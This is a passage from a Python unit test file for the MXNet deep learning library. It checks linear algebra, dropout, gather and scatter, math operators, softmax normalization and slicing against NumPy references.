data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs CUDA 8
# and the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test triangle extraction by doing a full roundtrip, since the intermediate extracted
# triangle uses a different element ordering than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/14288")
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count the number of zeros in the output
output_zeroes = zero_count(output, ratio)
# The relative error should stay within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
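# Build an indexing tuple that picks slice idx along `axis` and keeps every other axis whole.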
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check that out-of-bound indices raise an IndexError
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
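# Compare one MXNet unary operator against NumPy references: the forward values, and the
# backward gradient obtained by chaining a random output gradient through the NumPy derivative.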
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
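# NumPy reference for smooth_l1: 0.5*(sigma*x)^2 where |x| < 1/sigma^2, and |x| - 0.5/sigma^2 elsewhere.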
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
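# Derivative of the smooth_l1 reference: sigma^2 * x in the quadratic region, sign(x) outside it.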
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
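# Same comparison as for the unary operators, but for binary operators with two inputs and
# two backward gradients.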
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
